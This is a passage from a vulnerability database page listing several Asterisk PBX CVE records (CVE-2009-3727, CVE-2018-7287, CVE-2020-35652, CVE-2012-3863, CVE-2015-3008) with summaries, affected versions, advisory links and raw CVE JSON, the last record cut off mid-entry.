              "url": "http://marc.info/?l=bugtraq\u0026m=111946399501080\u0026w=2"
            },
            {
              "name": "asterisk-manager-interface-bo(21115)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/21115"
            },
            {
              "name": "http://www.portcullis-security.com/advisory/advisory-05-013.txt",
              "refsource": "MISC",
              "url": "http://www.portcullis-security.com/advisory/advisory-05-013.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2005-2081",
    "datePublished": "2005-06-30T04:00:00",
    "dateReserved": "2005-06-30T00:00:00",
    "dateUpdated": "2024-08-07T22:15:37.340Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2009-3727

Vulnerability from cvelistv5

Published

2009-11-10 18:00

Modified

2024-08-07 06:38

Severity ?

Summary

Asterisk Open Source 1.2.x before 1.2.35, 1.4.x before 1.4.26.3, 1.6.0.x before 1.6.0.17, and 1.6.1.x before 1.6.1.9; Business Edition A.x.x, B.x.x before B.2.5.12, C.2.x.x before C.2.4.5, and C.3.x.x before C.3.2.2; AsteriskNOW 1.5; and s800i 1.3.x before 1.3.0.5 generate different error messages depending on whether a SIP username is valid, which allows remote attackers to enumerate valid usernames via multiple crafted REGISTER messages with inconsistent usernames in the URI in the To header and the Digest in the Authorization header.

References

▼	URL	Tags
	http://secunia.com/advisories/37265	third-party-advisory, x_refsource_SECUNIA
	https://www.redhat.com/archives/fedora-package-announce/2009-November/msg00838.html	vendor-advisory, x_refsource_FEDORA
	http://secunia.com/advisories/37479	third-party-advisory, x_refsource_SECUNIA
	http://secunia.com/advisories/37677	third-party-advisory, x_refsource_SECUNIA
	http://www.debian.org/security/2009/dsa-1952	vendor-advisory, x_refsource_DEBIAN
	https://bugzilla.redhat.com/show_bug.cgi?id=523277	x_refsource_CONFIRM
	https://bugzilla.redhat.com/show_bug.cgi?id=533137	x_refsource_CONFIRM
	http://www.securityfocus.com/bid/36924	vdb-entry, x_refsource_BID
	https://www.redhat.com/archives/fedora-package-announce/2009-November/msg00789.html	vendor-advisory, x_refsource_FEDORA
	http://osvdb.org/59697	vdb-entry, x_refsource_OSVDB
	http://downloads.asterisk.org/pub/security/AST-2009-008.html	x_refsource_CONFIRM
	http://www.securitytracker.com/id?1023133	vdb-entry, x_refsource_SECTRACK

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T06:38:30.134Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "37265",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37265"
          },
          {
            "name": "FEDORA-2009-11126",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://www.redhat.com/archives/fedora-package-announce/2009-November/msg00838.html"
          },
          {
            "name": "37479",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37479"
          },
          {
            "name": "37677",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37677"
          },
          {
            "name": "DSA-1952",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2009/dsa-1952"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=523277"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=533137"
          },
          {
            "name": "36924",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/36924"
          },
          {
            "name": "FEDORA-2009-11070",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://www.redhat.com/archives/fedora-package-announce/2009-November/msg00789.html"
          },
          {
            "name": "59697",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/59697"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2009-008.html"
          },
          {
            "name": "1023133",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1023133"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2009-11-04T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk Open Source 1.2.x before 1.2.35, 1.4.x before 1.4.26.3, 1.6.0.x before 1.6.0.17, and 1.6.1.x before 1.6.1.9; Business Edition A.x.x, B.x.x before B.2.5.12, C.2.x.x before C.2.4.5, and C.3.x.x before C.3.2.2; AsteriskNOW 1.5; and s800i 1.3.x before 1.3.0.5 generate different error messages depending on whether a SIP username is valid, which allows remote attackers to enumerate valid usernames via multiple crafted REGISTER messages with inconsistent usernames in the URI in the To header and the Digest in the Authorization header."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2009-11-19T10:00:00",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "37265",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37265"
        },
        {
          "name": "FEDORA-2009-11126",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://www.redhat.com/archives/fedora-package-announce/2009-November/msg00838.html"
        },
        {
          "name": "37479",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37479"
        },
        {
          "name": "37677",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37677"
        },
        {
          "name": "DSA-1952",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2009/dsa-1952"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=523277"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=533137"
        },
        {
          "name": "36924",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/36924"
        },
        {
          "name": "FEDORA-2009-11070",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://www.redhat.com/archives/fedora-package-announce/2009-November/msg00789.html"
        },
        {
          "name": "59697",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/59697"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2009-008.html"
        },
        {
          "name": "1023133",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1023133"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2009-3727",
    "datePublished": "2009-11-10T18:00:00",
    "dateReserved": "2009-10-16T00:00:00",
    "dateUpdated": "2024-08-07T06:38:30.134Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2018-7287

Vulnerability from cvelistv5

Published

2018-02-22 00:00

Modified

2024-08-05 06:24

Severity ?

Summary

An issue was discovered in res_http_websocket.c in Asterisk 15.x through 15.2.1. If the HTTP server is enabled (default is disabled), WebSocket payloads of size 0 are mishandled (with a busy loop).

References

▼	URL	Tags
	http://www.securitytracker.com/id/1040419	vdb-entry, x_refsource_SECTRACK
	http://www.securityfocus.com/bid/103120	vdb-entry, x_refsource_BID
	https://issues.asterisk.org/jira/browse/ASTERISK-27658	x_refsource_CONFIRM
	http://downloads.digium.com/pub/security/AST-2018-006.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T06:24:11.789Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "1040419",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1040419"
          },
          {
            "name": "103120",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/103120"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27658"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2018-006.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2018-02-21T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in res_http_websocket.c in Asterisk 15.x through 15.2.1. If the HTTP server is enabled (default is disabled), WebSocket payloads of size 0 are mishandled (with a busy loop)."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-02-24T10:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "1040419",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1040419"
        },
        {
          "name": "103120",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/103120"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27658"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2018-006.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-7287",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in res_http_websocket.c in Asterisk 15.x through 15.2.1. If the HTTP server is enabled (default is disabled), WebSocket payloads of size 0 are mishandled (with a busy loop)."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "1040419",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1040419"
            },
            {
              "name": "103120",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/103120"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-27658",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27658"
            },
            {
              "name": "http://downloads.digium.com/pub/security/AST-2018-006.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2018-006.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2018-7287",
    "datePublished": "2018-02-22T00:00:00",
    "dateReserved": "2018-02-21T00:00:00",
    "dateUpdated": "2024-08-05T06:24:11.789Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2020-35652

Vulnerability from cvelistv5

Published

2021-01-29 07:22

Modified

2024-08-04 17:09

Severity ?

Summary

An issue was discovered in res_pjsip_diversion.c in Sangoma Asterisk before 13.38.0, 14.x through 16.x before 16.15.0, 17.x before 17.9.0, and 18.x before 18.1.0. A crash can occur when a SIP message is received with a History-Info header that contains a tel-uri, or when a SIP 181 response is received that contains a tel-uri in the Diversion header.

References

▼	URL	Tags
	https://issues.asterisk.org/jira/browse/ASTERISK-29219	x_refsource_MISC
	https://issues.asterisk.org/jira/browse/ASTERISK-29191	x_refsource_MISC
	https://downloads.asterisk.org/pub/security/AST-2020-004.html	x_refsource_CONFIRM
	https://downloads.asterisk.org/pub/security/AST-2020-003.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T17:09:14.847Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29219"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29191"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/AST-2020-004.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/AST-2020-003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in res_pjsip_diversion.c in Sangoma Asterisk before 13.38.0, 14.x through 16.x before 16.15.0, 17.x before 17.9.0, and 18.x before 18.1.0. A crash can occur when a SIP message is received with a History-Info header that contains a tel-uri, or when a SIP 181 response is received that contains a tel-uri in the Diversion header."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-01-29T07:24:02",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29219"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29191"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://downloads.asterisk.org/pub/security/AST-2020-004.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://downloads.asterisk.org/pub/security/AST-2020-003.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2020-35652",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in res_pjsip_diversion.c in Sangoma Asterisk before 13.38.0, 14.x through 16.x before 16.15.0, 17.x before 17.9.0, and 18.x before 18.1.0. A crash can occur when a SIP message is received with a History-Info header that contains a tel-uri, or when a SIP 181 response is received that contains a tel-uri in the Diversion header."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29219",
              "refsource": "MISC",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29219"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-29191",
              "refsource": "MISC",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29191"
            },
            {
              "name": "https://downloads.asterisk.org/pub/security/AST-2020-004.html",
              "refsource": "CONFIRM",
              "url": "https://downloads.asterisk.org/pub/security/AST-2020-004.html"
            },
            {
              "name": "https://downloads.asterisk.org/pub/security/AST-2020-003.html",
              "refsource": "CONFIRM",
              "url": "https://downloads.asterisk.org/pub/security/AST-2020-003.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2020-35652",
    "datePublished": "2021-01-29T07:22:40",
    "dateReserved": "2020-12-23T00:00:00",
    "dateUpdated": "2024-08-04T17:09:14.847Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2012-3863

Vulnerability from cvelistv5

Published

2012-07-09 10:00

Modified

2024-08-06 20:21

Severity ?

Summary

channels/chan_sip.c in Asterisk Open Source 1.8.x before 1.8.13.1 and 10.x before 10.5.2, Asterisk Business Edition C.3.x before C.3.7.5, Certified Asterisk 1.8.11-certx before 1.8.11-cert4, and Asterisk Digiumphones 10.x.x-digiumphones before 10.5.2-digiumphones does not properly handle a provisional response to a SIP reINVITE request, which allows remote authenticated users to cause a denial of service (RTP port exhaustion) via sessions that lack final responses.

References

▼	URL	Tags
	http://secunia.com/advisories/50687	third-party-advisory, x_refsource_SECUNIA
	http://secunia.com/advisories/50756	third-party-advisory, x_refsource_SECUNIA
	http://www.debian.org/security/2012/dsa-2550	vendor-advisory, x_refsource_DEBIAN
	http://www.securityfocus.com/bid/54327	vdb-entry, x_refsource_BID
	http://downloads.asterisk.org/pub/security/AST-2012-010.html	x_refsource_CONFIRM
	https://issues.asterisk.org/jira/browse/ASTERISK-19992	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T20:21:03.613Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "50687",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/50687"
          },
          {
            "name": "50756",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/50756"
          },
          {
            "name": "DSA-2550",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2550"
          },
          {
            "name": "54327",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/54327"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2012-010.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-19992"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-07-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "channels/chan_sip.c in Asterisk Open Source 1.8.x before 1.8.13.1 and 10.x before 10.5.2, Asterisk Business Edition C.3.x before C.3.7.5, Certified Asterisk 1.8.11-certx before 1.8.11-cert4, and Asterisk Digiumphones 10.x.x-digiumphones before 10.5.2-digiumphones does not properly handle a provisional response to a SIP reINVITE request, which allows remote authenticated users to cause a denial of service (RTP port exhaustion) via sessions that lack final responses."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2012-07-11T09:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "50687",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/50687"
        },
        {
          "name": "50756",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/50756"
        },
        {
          "name": "DSA-2550",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2550"
        },
        {
          "name": "54327",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/54327"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2012-010.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-19992"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-3863",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "channels/chan_sip.c in Asterisk Open Source 1.8.x before 1.8.13.1 and 10.x before 10.5.2, Asterisk Business Edition C.3.x before C.3.7.5, Certified Asterisk 1.8.11-certx before 1.8.11-cert4, and Asterisk Digiumphones 10.x.x-digiumphones before 10.5.2-digiumphones does not properly handle a provisional response to a SIP reINVITE request, which allows remote authenticated users to cause a denial of service (RTP port exhaustion) via sessions that lack final responses."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "50687",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/50687"
            },
            {
              "name": "50756",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/50756"
            },
            {
              "name": "DSA-2550",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2012/dsa-2550"
            },
            {
              "name": "54327",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/54327"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2012-010.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2012-010.html"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-19992",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-19992"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-3863",
    "datePublished": "2012-07-09T10:00:00",
    "dateReserved": "2012-07-06T00:00:00",
    "dateUpdated": "2024-08-06T20:21:03.613Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2015-3008

Vulnerability from cvelistv5

Published

2015-04-10 14:00

Modified

2024-08-06 05:32

Severity ?

Summary

Asterisk Open Source 1.8 before 1.8.32.3, 11.x before 11.17.1, 12.x before 12.8.2, and 13.x before 13.3.2 and Certified Asterisk 1.8.28 before 1.8.28-cert5, 11.6 before 11.6-cert11, and 13.1 before 13.1-cert2, when registering a SIP TLS device, does not properly handle a null byte in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority.

References

▼	URL	Tags
	http://packetstormsecurity.com/files/131364/Asterisk-Project-Security-Advisory-AST-2015-003.html	x_refsource_MISC
	http://www.securityfocus.com/bid/74022	vdb-entry, x_refsource_BID
	http://www.mandriva.com/security/advisories?name=MDVSA-2015:206	vendor-advisory, x_refsource_MANDRIVA
	http://advisories.mageia.org/MGASA-2015-0153.html	x_refsource_CONFIRM
	http://www.securitytracker.com/id/1032052	vdb-entry, x_refsource_SECTRACK
	http://downloads.asterisk.org/pub/security/AST-2015-003.html	x_refsource_CONFIRM
	http://seclists.org/fulldisclosure/2015/Apr/22	mailing-list, x_refsource_FULLDISC
	http://www.securityfocus.com/archive/1/535222/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://www.debian.org/security/2016/dsa-3700	vendor-advisory, x_refsource_DEBIAN
	http://lists.fedoraproject.org/pipermail/package-announce/2015-July/162260.html	vendor-advisory, x_refsource_FEDORA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T05:32:21.258Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/131364/Asterisk-Project-Security-Advisory-AST-2015-003.html"
          },
          {
            "name": "74022",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/74022"
          },
          {
            "name": "MDVSA-2015:206",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2015:206"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://advisories.mageia.org/MGASA-2015-0153.html"
          },
          {
            "name": "1032052",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1032052"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2015-003.html"
          },
          {
            "name": "20150408 AST-2015-003: TLS Certificate Common name NULL byte exploit",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2015/Apr/22"
          },
          {
            "name": "20150408 AST-2015-003: TLS Certificate Common name NULL byte exploit",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/535222/100/0/threaded"
          },
          {
            "name": "DSA-3700",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2016/dsa-3700"
          },
          {
            "name": "FEDORA-2015-5948",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-July/162260.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2015-04-08T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk Open Source 1.8 before 1.8.32.3, 11.x before 11.17.1, 12.x before 12.8.2, and 13.x before 13.3.2 and Certified Asterisk 1.8.28 before 1.8.28-cert5, 11.6 before 11.6-cert11, and 13.1 before 13.1-cert2, when registering a SIP TLS device, does not properly handle a null byte in a domain name in the subject\u0027s Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-09T18:57:01",
